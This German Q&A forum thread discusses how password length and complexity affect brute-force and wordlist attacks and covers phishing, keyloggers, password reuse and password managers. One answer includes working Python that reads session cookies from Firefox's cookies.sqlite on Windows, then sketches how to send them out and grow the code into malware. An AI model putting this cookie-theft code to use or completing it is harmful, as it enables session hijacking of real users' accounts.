Je schwieriger das Passwort, desto schwerer für einen Profi-Hacker?
Kann ein Profi-Hacker in der Regel ein kurzes und einfaches Passwort besser Hacken als ein langes und kompliziertes Passwort? Oder kann er alle Hacks etwa gleichgut Hacken.
8 Antworten
Das kommt stark auf den Angriff an.
Habe ich eine Datenbank erbeutet in der gehashte Passwörter stehen, kann man kürzere Passwörter tendenziell bei einem Bruteforce-Angriff (Ausprobieren aller möglichen Kombinationen) schneller knacken.
Bei einem Wörterbuchangriff (Ausprobieren eine Liste von möglichen Passwörtern) kommt es nicht unbedingt auf die Länge an. Ich kann in Passwortlisten auch durchaus lange Passwörter finden. So ist DiegoMaradonna10 zwar recht lang (16 Zeichen), wahrscheinlich aber auf vielen Wortlisten zu finden und damit in diesem Fall unsicherer als Pbn?x9uA welches eher nicht auf einer Wortliste auftauchen wird!
Andere Angriffe zielen nicht auf die Passwörter selber ab. Wenn ich zB die Cookies aus deinem Browser stehlen kann, kann ich diese nutzen um mich auf diversen Seiten ohne Passwort einzuloggen.
Wenn du mir dein Passwort auf einer Phishing-Seite selber verrätst oder ich das Passwort bei der Eingabe mit einem Keylogger abfange ist es auch egal wie komplex oder lang das Passwort ist.
usw.
Klar. Das ist weder schwer noch kompliziert. Ich habe das Beispiel in verschiedensten meiner Bücher auf untersch. Arten gezeigt... Im Grunde musst du
- Ermitteln welches Betriebssystem du hast dann kannst du daraus ableiten wo die Profil-Ordner der versch. Browser zu finden sind (Edge, Chrome, Firefox, Opera, ...)
- Prüfen welche Browser-Basisordner vorhanden sind und welche Profile es in den Ordnern gibt - im Grunde nur prüfen ob bestimmte Ordner vorhanden wären und ob sich darin bestimmte Dateien befinden
- Die Datei öffnen und die Cookies auslesen
- Die Daten verschicken
zB mit Python bei einem Firefox unter Windows:
import os
import sqlite3
# Basispfad zusammensetzen
f = os.path.join(os.getenv("APPDATA"), "Mozilla", "Firefox", "Profiles")
# Alle Ordner im Basispfad untersuchen
# ob darin die Datei cookies.sqlite liegt
for name in os.listdir(f):
sqlite_file = os.path.join(f, name, "cookies.sqlite")
if os.path.isfile(sqlite_file):
break
# cookies.sqlite öffnen und Daten auslesen
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
c.execute("SELECT host, name, value FROM moz_cookies")
for row in c:
print(row)
Statt dem print würde man dann die Daten logischerweise verschicken aber auch das geht mit 3 oder 4 weiteren Zeilen Programmcode.
Der Code berücksichtigt auch nicht, dass es eventuell mehrere Profile gibt - aber auch das wäre mit kleinen Änderungen zu bewerkstelligen!
Das spuckt dann auf meine System unter anderem folgendes aus:
...
('.portswigger.net', '_gat_UA-58487031-8', '1')
('.portswigger.net', '_gat', '1')
('.portswigger.net', 'SessionId', 'hättestduwohlgern;)')
('portswigger.net', 'Authenticated_UserVerificationId', 'hättestduwohlgern;)')
...
Nachtrag - hat man Admin-Rechte, kann man dies dann auch gut für alle User machen und nicht nur für den aktiven User.
Eine Schadware die mögliche Wege prüft um sich Admin-Rechte zu verschaffen und auch prüft ob jemand vor dem PC wäre (Webcam aktivieren und Personen im Bild suchen, etc.) und dann sämtliche User und versch. Browser unterstützt wäre mit ein paar hundert Codezeilen machbar.
Sowas bastelt dir ein halbwegs kompetenter Programmierer an einem Nachmittag oder max. einem ganzen Arbeitstag zusammen.
Also immer schön brav gecrackte Software aus dubiosen Quellen installieren und auf jeder Seite immer anhaken, dass man eingeloggt bleiben will. Sonst landen die eigenen Daten niemals im Darknet. #ironie ;-)
Wenn es darum geht Passwort Hashes zu knacken nutzt man eine Mischung aus bekannten Passwörtern und ausprobieren.
Dein Passwort sollte also aus möglichst vielen zufälligen Teilen bestehen. Das Ding hier ist, so etwas wie dein Name ist nicht zufällig. Man probiert nicht nur stumpf zufällige Passworter sondern auch z.b. (name)(zufallszahlen)(sonderzeichen). Du greifst halt die weise auf wie Leute Passwörter überlegen wenn du versuchst durch ausprobieren Passwort hashes zu knacken.
Also du brauchst am Ende ne Mischung aus Komplexität, Zufall und entsprechender Länge.
Ich empfehle einen Passwort Manager wie z.B. Bitwarden mit vollständig zufälligen Passwörtern mit entsprechender Länge zu nutzen.
Das Problem ist auch, wenn du ein Passwort bei mehreren Diensten nutzt und jemand bei einem Dienst an dein Passwort kommt wird man es auch bei anderen Diensten ausprobieren. Mit der häufigste Weg wie Leute gehackt werden. Das Problem an Passwörtern ist wenn sie kompliziert sind sind sie auch schwer zu merken. Und das macht es auch noch schwieriger bei jedem Dienst ein eigenes sicheres Passwort zu nutzen.
Das kommt auf die Art der Attacke. Grundsätzlich kommt es bei einem einfachen Bruteforce Angriff auf die mathematisch mögliche Anzahl aller Zeichen an.
Die Länge des Passworts spielt da eine Rolle, aber auch die Art der verwendeten Zeichen. Ein 20 Stelliges Passwort was nur aus Ziffern besteht, ist nicht so sicher wie ein 10 Stelliges Passwort, was aus Ziffern, Zeichen und Sonderzeichen besteht.
Ein reiner Bruteforce Angriff macht aber wenig Sinn, es wird minimal mit Passwortlisten gearbeitet, um die wahrscheinlichsten Kombinationen als erstes abzudecken. Wenn dein Passwort auf so einer Liste steht, dann ist es völlig egal, wie "Sicher" es ist.
Die meisten "gehackten" Passwörter werden aber nicht so umgangen. Die meisten Accounts und Zugriffe werden durch Sicherheitslücken umgangen, über die z.B. Passwortdatenbanken abgegriffen werden, über Trojaner und Sniffer, Phishing oder unverschlüsselte Verbindungen.
Das ist letzten Endes eine primär mathematische Frage. Je weiter hinten das Passwort bei den Probierversuchen (Brute force) kommt, desto unwahrscheinlicher ist es, dass es geknackt wird. Im Detail kommt es neben der Länge ein bisschen auf die Komplexität des Passworts und die Frage, ob Wörterbuchattacken hier Erfolg haben, an, primär aber auf die Vorgehensweise und die dem Angreifer zur Verfügung stehenden Ressourcen (Rechenleistung) an.
Der Profihacker knackt nicht dein Passwort der nutzt irgendeine Sicherheitslücke.
Bildlich gesprochen: statt das Türschloss zu knacken, steigt er durch das offene Kellerfenster.
Das stimmt nicht, Passwörter werden üblicherweise als Hash gespeichert. Du nutzt eine Sicherheitslücke um an diese Passwort hashes zu kommen und musst diese dann cracken.
Das jemand in ein System über eine Zeit lang kommt und die Passwörter vor dem hashing abfängt ist denkbar, aber diese typischen Leaks laufen eben nicht so ab.
Keylogger zwischen Tastatur und Rechner und schon ist das sicherste Passwort nutztzlos.
Wenn der User den falschen Link klickt und der Trojaner das System übernommen hat, wird das Nutzerpasswort auch gleich bei der Eingabe mit gelesenen.
Und wenn der Trojaner schon in der Chinesischen Hardware fest verbaut ist, naja dann ist eh alles zu spät.
Was du meinst sind zero days. Supply chain attacks sind für normale quasi Consumer nicht relevant und beweise über Chinesische Backdoors in Hardware gibt es nicht wirklich - die bekannte Bloomberg Story hat löcher.
Und wenn ich Code Execution auf deinem Rechner habe bringt dir auch ein gutes Passwort nicht. Das stimmt. Aber wenn deine Daten geleakt werden bringt dir ein gutes Passwort eben doch was. Und das ist für Consumer, zusammen mit social engineering, die größte Gefahr.
Keylogger zwischen Tastatur und Rechner ergibt nicht viel Sinn. Da musst du schon vor Ort sein um da Daten abzugreifen. Oder Code Execution bei dem Rechner haben, und wenn du das hast brauchst du keinen Keylogger "zwischen Tastatur und Rechner".
Er fragt nach Profihackern und nicht nach Skriptkidys. Profihacker nutzen auch Seroday-Lücken.
Du überschätzt den Begriff Profi. Wer reden hier von einem Consumer und nicht einem Ziel für state sponsored attacks. Und selbst wenn, deine mega hyper chad hacker sind ja auch nicht dumm.
In dem Fall würden die auch diesen Weg gehen wenn er möglich ist. Kein Hacker der was auf sich hält geht physisch bei dir vorbei und installiert da Hardware Keylogger wenn er deine Passwörter aus einem data dumb von vor 2 Jahren findet.
Und es bleibt halt trotzdem das mit es gibt keine Beweise für Chinesische Spionage Chips. Es gab da eine populäre Story die sich am Ende nicht als bestätigt raus gestellt hat.
Und es bleibt halt trotzdem das mit es gibt keine Beweise für Chinesische Spionage Chips.
Ist auch schlicht unplausibel. Viel zu aufwendig für die Massenüberwachung und wenn das entdeckt würde, hätte das extreme wirtschaftliche und politische Folgen. Eine Manipulation von Hardware ist etwas für hochrangige Ziele und dürfte im Regelfall eher auf dem Versandweg erfolgen.
Sagen wir es so - wir nutzen was gerade möglich ist oder was am erfolgversprechendsten ist... Klar werde ich keine Passwörter knacken und eventuell Tage damit verschwenden wenn ich mir die Cookies aus dem Browser mit XSS stehlen oder wenn ich den Rechner eines Users mit Schadware infizieren kann.
Bleibt mir aber keine andere Option nutze ich auch schon mal Bruteforce -Angriffe aber dann mit recht stark gekürzten Wortlisten um die wirklich schlechten Passwörter auszunutzen. Einfach darum weil das sonst zu lange dauert.
Man darf auch nicht vergessen, dass riesige Botnets wie Mirai nur auf Buteforce-Angriffen basierten!
Bildlich gesprochen warum soll ich mich durch das Kellerfenster zwängen wenn ich das 10 EUR Baumarktschloss mit der Picgun in 15-20 Sek. offen habe?
Echt jetzt?